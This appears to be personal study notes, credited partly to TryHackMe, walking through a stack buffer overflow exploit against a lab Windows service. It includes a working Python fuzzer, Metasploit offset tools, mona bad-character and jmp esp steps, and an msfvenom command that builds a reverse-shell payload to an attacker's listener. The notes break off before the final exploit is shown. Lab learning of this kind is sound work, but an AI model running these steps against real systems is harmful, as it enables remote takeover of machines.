<aside> 💡 A Buffer Overflow Attack is an attack that abuses a type of bug called a “buffer overflow”, in which a program overwrites memory adjacent to a buffer that should not have been modified intentionally or unintentionally

</aside>

Workflow

  1. Open/Attach the program to Immunity Debugger
  2. Run fuzzing script and identify the largest bytes sent when the application crashed fuzzer.py (Credits to TryHackMe)
#!/usr/bin/env python3
import socket, time, sys

ip = "192.168.17.130" # Change this
port = 9999           # Change this
timeout = 5
prefix = ""           # Change if needed

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)
  except:
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"
  time.sleep(1)
  1. Generate payload using /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <BYTES_NUMBER>
  2. Copy the payload to the exploit.py script
  3. Re-open the application using Immunity Debugger, and run the script
  4. Pay attention to the string that appears next to the EIP and use it in following command /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <BYTES_NUMBER> -q <STRING_FOUND> This will give us the exact offset for the EIP
  5. We can perform a small test to check if the offset is correct Send payload with the exact number of the offset and add “BBBB” at the end, if it’s working, we should see near the EIP 42424242 💪
  6. The next step is to check for bad characters (included in the script), we’re going to add this after our payload times the offset, like so: "A" * offset + badChars
  7. Immunity Debugger will pause and we can find our bad chars using the ESP address

Untitled

  1. We need to make sure that we can see all the bad chars in there, otherwise they are BAD CHARACTERS and we need to write them down. I prefer copy the entire thing from 01 to FF, and compare it visually by myself, others might use automation tools or !mona compare
  2. Now we’re going to find a jump point, using this command: !mona jmp -r esp -cpb "\\x00"

Untitled

  1. We’re going to copy the address and use it in our code, but we’ll right backwards, for example if our address in this case is: 625014DF it will be used like this: "\\xdf\\x14\\x50\\x62"
  2. our next step will be to acquire the malicious payload using msfvenom msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\\x00" -f c We’ll take the payload into our code, copy the unsigned char buf[] part
  3. One last step for our payload will be the Prepend NOPs, Since an encoder was likely used to generate the payload, you will need some space in memory for the payload to unpack itself. You can do this by setting the padding variable to a string of 16 or more "No Operation" (\x90) bytes: padding = "\\x90" * 16
  4. Eventually our context that will be sent will be built like so: